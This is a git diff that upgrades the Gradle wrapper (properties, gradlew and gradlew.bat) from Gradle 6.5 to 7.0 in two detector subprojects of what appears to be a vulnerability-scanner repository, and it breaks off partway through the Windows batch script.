differ diff --git a/google/detectors/rce/cve20196340/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/cve20196340/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/cve20196340/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/cve20196340/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/rce/cve20196340/gradlew b/google/detectors/rce/cve20196340/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/cve20196340/gradlew +++ b/google/detectors/rce/cve20196340/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/cve20196340/gradlew.bat b/google/detectors/rce/cve20196340/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/cve20196340/gradlew.bat +++ b/google/detectors/rce/cve20196340/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/cve20199193/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/cve20199193/gradle/wrapper/gradle-wrapper.jar index 7831296e4..d64cd4917 100644 Binary files a/google/detectors/rce/cve20199193/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/cve20199193/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/cve20199193/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/cve20199193/gradle/wrapper/gradle-wrapper.properties index 9e6fcc10e..d04736436 100644 --- a/google/detectors/rce/cve20199193/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/cve20199193/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -zipStorePath=wrapper/dists +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME +zipStorePath=wrapper/dists diff --git a/google/detectors/rce/cve20199193/gradlew b/google/detectors/rce/cve20199193/gradlew index 12d12895c..1aa94a426 100755 --- a/google/detectors/rce/cve20199193/gradlew +++ b/google/detectors/rce/cve20199193/gradlew @@ -1,78 +1,127 @@ -#!/usr/bin/env sh +#!/bin/sh + +# +# Copyright © 2015-2021 the original authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null - -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS="" +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar + # Determine the Java command to use to start the JVM. if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -81,92 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. + +# For Cygwin or MSYS, switch paths to Windows format before running java +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) -# For Cygwin, switch paths to Windows format before running java -if $cygwin ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=$((i+1)) + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - (0) set -- ;; - (1) set -- "$args0" ;; - (2) set -- "$args0" "$args1" ;; - (3) set -- "$args0" "$args1" "$args2" ;; - (4) set -- "$args0" "$args1" "$args2" "$args3" ;; - (5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - (6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - (7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - (8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - (9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=$(save "$@") - -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS --illegal-access=permit --add-opens java.base/java.lang=ALL-UNNAMED $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" -# by default we should be in the correct project dir, but when run from Finder on Mac, the cwd is wrong -if [ "$(uname)" = "Darwin" ] && [ "$HOME" = "$PWD" ]; then - cd "$(dirname "$0")" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" fi +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' + exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/cve20199193/gradlew.bat b/google/detectors/rce/cve20199193/gradlew.bat index f9553162f..93e3f59f1 100644 --- a/google/detectors/rce/cve20199193/gradlew.bat +++ b/google/detectors/rce/cve20199193/gradlew.bat @@ -1,4 +1,20 @@ -@if "%DEBUG%" == "" @echo off +@rem +@rem Copyright 2015 the original author or authors. +@rem +@rem Licensed under the Apache License, Version 2.0 (the "License"); +@rem you may not use this file except in compliance with the License. +@rem You may obtain a copy of the License at +@rem +@rem https://www.apache.org/licenses/LICENSE-2.0 +@rem +@rem Unless required by applicable law or agreed to in writing, software +@rem distributed under the License is distributed on an "AS IS" BASIS, +@rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +@rem See the License for the specific language governing permissions and +@rem limitations under the License. +@rem + +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -9,19 +25,23 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% +@rem Resolve any "." and ".." in APP_HOME to make it shorter. +for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi + @rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -set DEFAULT_JVM_OPTS= +set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" @rem Find java.exe if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -35,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -45,38 +65,26 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar + @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath 